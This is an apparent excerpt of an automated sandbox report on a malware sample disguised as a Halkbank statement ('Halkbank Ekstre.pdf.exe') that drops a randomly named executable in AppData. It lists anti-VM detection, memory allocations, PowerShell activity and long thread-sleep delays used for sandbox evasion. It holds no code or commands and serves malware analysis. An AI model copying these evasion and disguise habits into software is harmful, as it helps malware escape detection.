Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uAHDaCgpWpsogA.exe PID: 2876, type: MEMORYSTR

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Memory allocated: 25C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Memory allocated: 27F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Memory allocated: 25F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Memory allocated: 87F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Memory allocated: 6BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Memory allocated: 97F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Memory allocated: A7F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Memory allocated: AF70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Memory allocated: BF70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Memory allocated: CF70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Memory allocated: 17B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Memory allocated: 3370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Memory allocated: 5370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Memory allocated: 1200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Memory allocated: 2FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Memory allocated: 2D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Memory allocated: 8B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Memory allocated: 74A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Memory allocated: 9B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Memory allocated: AB50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Memory allocated: B2A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Memory allocated: C2A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Memory allocated: D2A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Memory allocated: 17D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Memory allocated: 3220000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Memory allocated: 5220000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 599670	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 599451	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598989	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598749	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598311	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598201	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 596992	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 596337	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 596184	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595999	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594905	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594249	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594140	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594031	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 593921	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 593812	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 593703	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 593593	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 593484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 599874
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 599655
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 599296
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 599187
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 599076
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 598953
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 598843
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 598733
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 598624
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 598489
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 598287
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597796
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597577
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597468
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597358
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597249
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597031
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596921
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596702
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596590
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596468
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596355
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596234
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596124
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596015
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595796
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595687
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595578
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595468
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595249
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595140
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595031
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 594921
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 594812
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 594702
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 594593
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 594478
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 594374
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 594265

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7561	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2086	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7549	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2092	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Window / User API: threadDelayed 3046	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Window / User API: threadDelayed 6790	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Window / User API: threadDelayed 1982
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Window / User API: threadDelayed 7873

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2720	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1272	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1524	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 400	Thread sleep count: 3046 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 400	Thread sleep count: 6790 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -599670s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -599451s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -598989s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -598749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -598640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -598421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -598311s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -598201s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -598093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -597546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -597218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -596992s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -596337s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -596184s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -595999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -595671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -595343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -594905s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -594796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -594468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -594359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -594249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -594140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -594031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -593921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -593812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -593703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -593593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788	Thread sleep time: -593484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 3108	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -600000s >= -30000s
